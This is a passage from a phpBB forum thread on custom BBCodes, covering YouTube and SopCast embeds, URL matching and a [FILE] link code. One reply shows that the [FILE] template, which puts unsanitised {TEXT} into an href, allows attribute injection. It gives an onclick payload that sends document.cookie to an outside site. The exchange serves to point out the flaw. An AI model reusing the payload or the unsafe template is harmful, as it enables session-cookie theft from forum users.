<param value="sopcast_channel" name="SopAddress"/>
<param value="ChannelName" name="CCTV5"/>
</object>

i need to make that into a bbcode, i assume the part i change is "sopcast_channel
Do you have another code for a different video?
I would assume the part specifying which video to play is the "CCTV5" in the above code.
CCTV5 is just the channel name, I am really stuck with this one

Is there any way to do some regex searching. For example. I want embedded videos, but there are many ways to use the same video

31242e
http://www.xfire.com/video/31242e/
http://www.xfire.com/video/31242e
http://xfire.com/video/31242e/

The list goes on and on...

What I want is ONE BBCode that could accept all of these arguments.

Is there a way to make Youtube display the 360p, 480p, 720p, 1080p options while embedding the videos on posts?

The first post of this thread is not doing that... at least not in the video I tested (360/240p).

I have tried using the bbcode in the first thread and it seems fine. You need to play the video in order to see the settings and also depending on the original youtube video quality settings. :)

Re: Custom BBCodes - [FILE] bb code

Post by artiprinted » Tue Aug 10, 2010 3:32 pm

Here is my bb code to get file:// to work also to get \\localhost\ to work when trying to show a user a folder on the hard drive. the only way to get localhost to work is to use 127.0.0.1 ip. they filter the word or something.

BBCode usage

Code: Select all

[FILE]{TEXT}[/FILE]
HTML replacement

Code: Select all

<a href="file:///{TEXT}">{TEXT}</a>
Help line

Code: Select all

[FILE]\\ServerNameText\[/FILE] or [FILE]\\127.0.0.1\c$\folder[/FILE]

{TEXT} is fun. Consider my following input:

Code: Select all

[FILE]" id="me666" onclick="document.getElementById('me666').href='#';window.location.href='http://www.google.com/search?q='+document.cookie;return true;[/FILE]
Better use {URL} - your UNCs can also use slahes instead of backslahes.

In the following YouTube code, I want to add the "go to fullscreen" button that you normally have on the YouTube website too. How do I edit the code to do that?

Code: Select all

<object width="631" height="378"><param name="movie" value="http://www.youtube.com/v/{SIMPLETEXT}"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/{SIMPLETEXT}" type="application/x-shockwave-flash" wmode="transparent" width="631" height="378"></embed></object>

Youtube BBcode, I am currenly using:

Code: Select all

<object width="425" height="350"><param name="movie" value="{URL}"></param><param name="wmode" value="transparent"></param><embed src="{URL}" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed></object>
For some reason, I don't get a thumbnail display. I know the embed is processing, since when I post multiple videos in one post, my post box is larger than normal.

I had a bit of trouble with this in the past, and it mysteriously started working. Anyone else run into this issue?

I would like to avoid the Youtube BBcode which only works with the video ID.

That's because the object movie value and the embed src is not the same as the link, it should be like the one in the first post Youtube (embed video in post) Using the full URI ;)

TYVM. That worked well. I remember trying that not too long ago, and the thumbnails wouldn't appear.

But anyhow, thanks again.

Indeed, the used theme, quality and other options are all contained in the <object> tag, so simplifying it to a will of course reduce your choices.

Okay in this post I did a strikethrough and it worked: http://operation420.net/forum/viewtopic.php?f=2&t=1792 But the post I linked to:
I see Nolvorite already is doing it --> http://operation420.net/forum/viewtopic ... 9811#p9811
still shows the BB Code and not the results of said code

They wrote "you could classify me as an white asian person lol..." before I added the tag. How do I make it show up, when I goto edit their post and click preview it shows up proper, but on the forum it doesn't :(

bbcodes are not retrospective. i.e. a bbcode must be defined when the post is made for it to work.
If you had reposted that message without making any of changes, the bbcode would have become active.
There is a tool in the Support Toolkit which can automatically redo this for all old messages.

Hey guys! Who can help me program the imgmap BBC? :) You know, so that users can create an imagemap in their posts or sigs. It proved very useful to us in our previous location, but now that we're on a forum of our own... well, I don't really know how to program it myself!
